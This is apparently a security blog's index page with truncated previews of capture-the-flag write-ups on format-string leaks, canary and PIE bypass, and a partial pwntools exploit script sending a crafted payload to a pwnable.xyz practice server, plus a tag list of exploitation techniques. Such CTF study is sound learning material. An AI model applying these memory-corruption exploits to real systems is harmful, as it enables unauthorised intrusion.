Writeup: echo2
At first we realize that there is a format string vulnerability by which we can leak the memory addresses of the stack and thus bypassing ASLR. After a few attempts we see that in position %10$p we leak memory address of the stack and at minus 0x20 it would be the pointer of name whose test content we entered was "AAAA". The next step is to create our exploit that makes the leak using pwntools l..
Armoury - Pragyan CTF 19
Writeup - From Format String to Buffer OverflowPKTeam Recon First of all we see the protections of the binary. We have several problems. We can not execute code in the stack such as a shellcode due to NX, we can not overflow without having a canary leak and if we want to attach with gdb we have to bypass PIE as if we want to do ROP (Return-Oriented Programming). We also need leak of a function t..
Challenge GrownUp from pwnable.xyz nc svc.pwnable.xyz 30004 Exploit from pwn import * context.log_level = 'debug' p = remote("svc.pwnable.xyz",30004) #p = process('./GrownUpRedist') #gdb.attach(p,''' #break *0x0000000000400914 #continue #''') p.recvuntil("Are you 18 years or older? [y/N]: ") payload = "\x79"+"aaaBCCC"+"\x80\x10\x60" p.sendline(payload) p.recvuntil("Name: ") #payload = "AAAABBBBA..
- Total
- Today
- Yesterday
- format string
- leak libc
- hijacking redirection flow
- Windows
- one gadget
- 32Bit
- fake stack frame
- html injection
- theFaunia course
- XSS
- buffer overflow
- dnspy
- open-redirect
- cracking
- GOT Dereferencing/Overwriting
- Pwnable.kr
- shellcode
- use after free
- Backdoors
- write primitive
- Call oriented programming
- leak stack memory address
- return oriented programming
- arithmetic overflow/underflow
- pwnable.tw
- ASM
- x64dbg
- canary
- pwnable.xyz
- stack pivot
| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | 5 | ||
| 6 | 7 | 8 | 9 | 10 | 11 | 12 |
| 13 | 14 | 15 | 16 | 17 | 18 | 19 |
| 20 | 21 | 22 | 23 | 24 | 25 | 26 |
| 27 | 28 | 29 | 30 |